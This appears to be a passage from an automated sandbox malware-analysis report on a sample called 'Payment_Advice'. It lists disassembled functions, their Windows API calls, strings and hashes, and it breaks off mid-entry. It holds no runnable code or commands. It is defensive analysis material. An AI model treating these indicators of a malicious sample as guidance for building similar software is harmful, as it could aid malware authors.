                                                      • Opcode Fuzzy Hash: 3c6efe23a093742c34db4b48b740bbbc0e43620cdf862bd3b4c0e14241e1dd01
                                                      • Instruction Fuzzy Hash: DA416371514301AAC720AF759D49A9FBAE8EF84704F00483FF945E3292DB78D9448BAE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411A02 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A12
                                                      • RtlInitializeCriticalSection.NTDLL(00417660), ref: 00411A1E
                                                      • TlsGetValue.KERNEL32(?,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A34
                                                      • RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00411A4E
                                                      • RtlEnterCriticalSection.NTDLL(00417660), ref: 00411A5F
                                                      • RtlLeaveCriticalSection.NTDLL(00417660), ref: 00411A7B
                                                      • GetCurrentProcess.KERNEL32(00000010,00100000,00000000,00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A94
                                                      • GetCurrentThread.KERNEL32 ref: 00411A97
                                                      • GetCurrentProcess.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A9E
                                                      • DuplicateHandle.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411AA1
                                                      • RegisterWaitForSingleObject.KERNEL32(0000000C,00000010,00411AFA,00000000,000000FF,00000008), ref: 00411AB7
                                                      • TlsSetValue.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411AC4
                                                      • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00411AD5
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2673290768-0
                                                      • Opcode ID: ab633c144f53e305bafac38ae2cfbb9d27ffbee8e6733c7f67bceb8c74a85dc5
                                                      • Instruction ID: 43bccb5f44728a0c183a358cb80f19a3296933c80aeccc21ff8ea1a4f9ffad6c
                                                      • Opcode Fuzzy Hash: ab633c144f53e305bafac38ae2cfbb9d27ffbee8e6733c7f67bceb8c74a85dc5
                                                      • Instruction Fuzzy Hash: A6210771646202AFDB109F64EC88F963FB9FB08391F16C07AF605962B5DB75D840CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A47A Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
                                                        • Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,?), ref: 0040DF07
                                                      • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,00000000,?,?,?,00000009,0040391C,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A4A3
                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A4B5
                                                      • wcscpy.MSVCRT ref: 0040A4DB
                                                      • wcscat.MSVCRT ref: 0040A4E6
                                                      • wcslen.MSVCRT ref: 0040A4EC
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040391C,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0040420D,00000000), ref: 0040A501
                                                      • wcscat.MSVCRT ref: 0040A519
                                                      • wcslen.MSVCRT ref: 0040A51F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Librarywcscatwcslen$AddressAllocateFreeHeapLoadProcValuewcscpy
                                                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                      • API String ID: 1264281023-287042676
                                                      • Opcode ID: 2ed63fd5278731c2a59bb78a547ea7f4314f45ed7590921f0cbfa87005ef0111
                                                      • Instruction ID: eb5fdde348852424068ecc2b7fae0cfe8f77c0b49747bf43ed6907260fe0b972
                                                      • Opcode Fuzzy Hash: 2ed63fd5278731c2a59bb78a547ea7f4314f45ed7590921f0cbfa87005ef0111
                                                      • Instruction Fuzzy Hash: 6B213D31244301B6C61037799C5AF6F3A58EB91BD4F10403BF505B51C2D6BCC6659ABF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403400 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040348D
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403496
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004035B6
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000), ref: 004035BF
                                                        • Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004034C6
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004035F3
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 004035FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                      • String ID: sysnative
                                                      • API String ID: 3406704365-821172135
                                                      • Opcode ID: e3b826f6699c9025632e7203f33aefa29e5d8351d3247abac65243d099ba1b72
                                                      • Instruction ID: d4425b2f06f1909e048ad8278635bd2b3a0af93032fa13b78a94668e4e3fc597
                                                      • Opcode Fuzzy Hash: e3b826f6699c9025632e7203f33aefa29e5d8351d3247abac65243d099ba1b72
                                                      • Instruction Fuzzy Hash: 33513275618301BAD600BBB1CC86F2F7AA9DFC4718F14C83EB045751D2CA7CD949AA6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D683 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040D691
                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040D6A6
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040D6C1
                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040D6D0
                                                      • Sleep.KERNEL32(00000000), ref: 0040D6E2
                                                      • InterlockedExchange.KERNEL32(?,00000002), ref: 0040D6F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                      • API String ID: 2918862794-1339284965
                                                      • Opcode ID: 41b54250eae642625e703921e8a958d907d6cad9eca91794897e3b8843e46bfc
                                                      • Instruction ID: abb353811933e5e0c01fdc05904e278036aeff3206fed199cedc2971c8720e75
                                                      • Opcode Fuzzy Hash: 41b54250eae642625e703921e8a958d907d6cad9eca91794897e3b8843e46bfc
                                                      • Instruction Fuzzy Hash: 7D01D431640204BBD7101FE4ED49FAF3B29EB42711F11483AF509A11C0DBBA8909CA6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409147 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409151
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040915F
                                                      • IsWindowVisible.USER32(?), ref: 00409166
                                                        • Part of subcall function 0040D7B2: RtlAllocateHeap.NTDLL(00000008,00000000,0040D02C), ref: 0040D7BE
                                                      • GetCurrentThreadId.KERNEL32 ref: 00409183
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00409190
                                                      • GetForegroundWindow.USER32 ref: 0040919E
                                                      • IsWindowEnabled.USER32(?), ref: 004091A9
                                                      • EnableWindow.USER32(?,00000000), ref: 004091B9
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapLongProcessVisible
                                                      • String ID:
                                                      • API String ID: 684997728-0
                                                      • Opcode ID: 1e5e3ab6f795d1081319b8141dacc3ba20eef2c070a75b8bad31eb9fa4f2ad39
                                                      • Instruction ID: 31eda471f1cb499a369295ecb2023523c5ccaadffeb814b028fd5651457c72f2
                                                      • Opcode Fuzzy Hash: 1e5e3ab6f795d1081319b8141dacc3ba20eef2c070a75b8bad31eb9fa4f2ad39
                                                      • Instruction Fuzzy Hash: C001D4313043016EE7206B75AC8CAABBBE9AF45760B09803EF445E22E5D774CC01C629
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004091C8 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumWindows.USER32(00409147,?), ref: 004091DB
                                                      • GetCurrentThreadId.KERNEL32 ref: 004091F3
                                                      • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,00408F50,00000000,00408B2A), ref: 0040920F
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040922F
                                                      • EnableWindow.USER32(?,00000001), ref: 00409245
                                                      • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040925C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$CurrentThread$EnableEnumWindows
                                                      • String ID:
                                                      • API String ID: 2527101397-0
                                                      • Opcode ID: 459104275141b0c715442643ba30dab32395702e9f7f189deadac9fa7278c8c8
                                                      • Instruction ID: d7320be81d177d1dafbd7ad4d3aa491d2180030fb93e63f46d4512a3211b406d
                                                      • Opcode Fuzzy Hash: 459104275141b0c715442643ba30dab32395702e9f7f189deadac9fa7278c8c8
                                                      • Instruction Fuzzy Hash: DA11CD31108741BBDB314F56EC48F53BFA9EB81B10F118ABEF065221E1C7749C04C618
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040CF93 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFB8
                                                      • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040CFCC
                                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFD9
                                                      • TlsGetValue.KERNEL32(00000010,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFF0
                                                      • RtlReAllocateHeap.NTDLL(00000008,00000000), ref: 0040CFFF
                                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D00E
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$AllocateHeap$Alloc
                                                      • String ID:
                                                      • API String ID: 2511646910-0
                                                      • Opcode ID: f8d4ac58cec971f74a9cdcc41d0ae8b1470346a7d61edf378338f4034cbf9928
                                                      • Instruction ID: e522f20ebd739161ea3b186ba5f08d5ad4d1c0e942c2e649f6f8b5b45fa9f158
                                                      • Opcode Fuzzy Hash: f8d4ac58cec971f74a9cdcc41d0ae8b1470346a7d61edf378338f4034cbf9928
                                                      • Instruction Fuzzy Hash: 0E115172644311BFD7109F65EC44EA6BBBAFB48750B05803AF904D73A0DB75D8048A98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411984 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • UnregisterWait.KERNEL32(?), ref: 0041198E
                                                      • CloseHandle.KERNEL32(?), ref: 00411997
                                                      • RtlEnterCriticalSection.NTDLL(00417660), ref: 004119A3
                                                      • RtlLeaveCriticalSection.NTDLL(00417660), ref: 004119C8
                                                      • HeapFree.KERNEL32(00000000,?), ref: 004119E6
                                                      • HeapFree.KERNEL32(?,?), ref: 004119F8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                      • String ID:
                                                      • API String ID: 4204870694-0
                                                      • Opcode ID: b15370ecc5d11d915fbc3e1ce94f3eb57d9f5ff0b77fa269a9f14ba5a6eba08a
                                                      • Instruction ID: eb1efa575c7a1193ad789bfe2817c469877bfdc7e410445902cedd1c0dbf730b
                                                      • Opcode Fuzzy Hash: b15370ecc5d11d915fbc3e1ce94f3eb57d9f5ff0b77fa269a9f14ba5a6eba08a
                                                      • Instruction Fuzzy Hash: E60117B4202602AFC7148F15EC88EAABF79FF493117118139E62A86620C731E851CB9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040554D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 0040555C
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040556B
                                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040557B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcmemset
                                                      • String ID: RtlGetVersion$ntdll.dll
                                                      • API String ID: 3137504439-1489217083
                                                      • Opcode ID: 7c8b8c6c6b7fc7594bb483547fa99cc840af9721d0a9f5de1a7f0785217d556d
                                                      • Instruction ID: 4c3a86b3ef4fb80ccf96d51786c1ad7f8faddb0dd8553e640a4690cba62d6515
                                                      • Opcode Fuzzy Hash: 7c8b8c6c6b7fc7594bb483547fa99cc840af9721d0a9f5de1a7f0785217d556d
                                                      • Instruction Fuzzy Hash: 2CE0D8317505113AD6205B316C05FEB3A9DCFC9704B110536B545F21C4D678C5018ABD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054A5
                                                      • RtlEnterCriticalSection.NTDLL(00417680), ref: 004054B7
                                                      • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054CE
                                                      • CloseHandle.KERNEL32(00000008,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054DA
                                                        • Part of subcall function 0040D772: HeapFree.KERNEL32(00000000,?,0040926D,004170C4,00000008,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040D7AB
                                                      • RtlLeaveCriticalSection.NTDLL(00417680), ref: 0040551D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 3708593966-0
                                                      • Opcode ID: f9fc4f274073ef879c89f055458ad22c593e0fdcee0f3c8d66018c8da72653c2
                                                      • Instruction ID: 79bf3139b6f1ab76d1202ff17a489f7276a24f81600fa3e90aae253bd74edf71
                                                      • Opcode Fuzzy Hash: f9fc4f274073ef879c89f055458ad22c593e0fdcee0f3c8d66018c8da72653c2
                                                      • Instruction Fuzzy Hash: CF11C232544711AFD7105F68EC44FD7BBB8EF45761722803AF804972A1DB75E8808BAC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D586 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D59A
                                                      • RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D5EF
                                                        • Part of subcall function 0040D586: HeapFree.KERNEL32(00000000,?,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D5E8
                                                      • RtlDeleteCriticalSection.NTDLL(00000020), ref: 0040D608
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3), ref: 0040D617
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                      • String ID:
                                                      • API String ID: 3171405041-0
                                                      • Opcode ID: 83fa752a7cac786abdb8633e5ae663743960f93593eff6c1d174bce996cff11c
                                                      • Instruction ID: 3d4c950c7840245ecf787318483d856215c0b9662098a14833ae3b93709eff97
                                                      • Opcode Fuzzy Hash: 83fa752a7cac786abdb8633e5ae663743960f93593eff6c1d174bce996cff11c
                                                      • Instruction Fuzzy Hash: CE110435501602AFC7249F55EC48F97BBB9EB48305F12843AA816A26A1CB35E845CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004092D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
                                                        • Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,?), ref: 0040DF07
                                                      • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401991,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004092F4
                                                      • wcscmp.MSVCRT ref: 00409302
                                                      • memmove.MSVCRT ref: 0040931A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                                                      • String ID: \\?\
                                                      • API String ID: 2309408642-4282027825
                                                      • Opcode ID: fd930755749ed3d2be605ff4be820197e70570634f0ba2bf411523a77f39549e
                                                      • Instruction ID: d1022656d2e26dd14f3e25edef1fec080478658712660f720d71a31c09dbf965
                                                      • Opcode Fuzzy Hash: fd930755749ed3d2be605ff4be820197e70570634f0ba2bf411523a77f39549e
                                                      • Instruction Fuzzy Hash: 8CF0E2B35006017AC20067BAEC85CAB7B6CEF95370780023FF515D20D6EA38D81486A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040AE76 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: memset$memcpy
                                                      • String ID:
                                                      • API String ID: 368790112-0
                                                      • Opcode ID: 77a43cbbb6266ba10a119da92b1386f508399576c8cf03208af1230622900171
                                                      • Instruction ID: ff3a12849f14474e25052ccd38566c33d2c186ec74ba694f67bf1beed8dc7c58
                                                      • Opcode Fuzzy Hash: 77a43cbbb6266ba10a119da92b1386f508399576c8cf03208af1230622900171
                                                      • Instruction Fuzzy Hash: 89212531B907086BE524AA29DC86F9F738CDB86708F50063EF201FA1C1D67DE54547AE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405B40 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeapwcsncpy
                                                      • String ID:
                                                      • API String ID: 1358295784-0
                                                      • Opcode ID: dbefc154c3fd0c86216f953ee4b31303624e33edbc8c1b27b50f459021298698
                                                      • Instruction ID: c1c3d513005c3c241562a142b51836119b7241697b797653b2b83cf70e1dc3f7
                                                      • Opcode Fuzzy Hash: dbefc154c3fd0c86216f953ee4b31303624e33edbc8c1b27b50f459021298698
                                                      • Instruction Fuzzy Hash: DF51C030508B069BDB209F28D844A6B77F4FF84348F544A2EFC45A72D0E779E905CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D1BF Relevance: 6.1, APIs: 4, Instructions: 134memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 0040D1D3
                                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D288
                                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D2AB
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0040D303
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateCriticalHeapSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3625150316-0
                                                      • Opcode ID: c10679976362d654b585f1ec8b68fb6b9a3b4e8ac0eceb1a9ed7d32880a1cb5b
                                                      • Instruction ID: a17e627e050f24daf4e0fc7d3c0e54bac809a59e300a572b9792337043ee6586
                                                      • Opcode Fuzzy Hash: c10679976362d654b585f1ec8b68fb6b9a3b4e8ac0eceb1a9ed7d32880a1cb5b
                                                      • Instruction Fuzzy Hash: B951E470A01B029FC728CFA9D580926B7F4FF587103158A7EE89AD7A50D334F959CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004062B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CharLower
                                                      • String ID:
                                                      • API String ID: 1615517891-0
                                                      • Opcode ID: 7e3cda2dc92e76a3f7f6f8fc87e0455d9eabfe1fe7eb39cd3677ec52a9aeb089
                                                      • Instruction ID: d067756844b34a6404b07e6cf1397282c6a25047d21fa5d7bde466b1de65efe4
                                                      • Opcode Fuzzy Hash: 7e3cda2dc92e76a3f7f6f8fc87e0455d9eabfe1fe7eb39cd3677ec52a9aeb089
                                                      • Instruction Fuzzy Hash: E42146756043058BC720EF5998405BBB7E4EB80760F86447AFC86A3380D638EE159BE9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409C83 Relevance: 6.1, APIs: 4, Instructions: 80memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeapmemsetwcscpywcslen
                                                      • String ID:
                                                      • API String ID: 2037025450-0
                                                      • Opcode ID: a20fb1cacd0096f501daf125df341b11e239634ed8c318d74144b3a8a3b1d6da
                                                      • Instruction ID: 3306218dfe6fd6935e1b76e0e8dc860d4400add17917e302399b454d6a157e83
                                                      • Opcode Fuzzy Hash: a20fb1cacd0096f501daf125df341b11e239634ed8c318d74144b3a8a3b1d6da
                                                      • Instruction Fuzzy Hash: A121F472504701AFD721AF65D840B6BB7E9EF88314F14892FF64562692CB39EC048B18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A20 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409B3A
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B46
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409B5A
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,00000000,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B70
                                                      • RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409A3F
                                                      • RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409A65
                                                      • RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409AC2
                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409ADC
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$Free$Allocate
                                                      • String ID:
                                                      • API String ID: 3472947110-0
                                                      • Opcode ID: 8d405e1b173177ea89790586d235f10fc7f712f384bf1d367d23111c52829df9
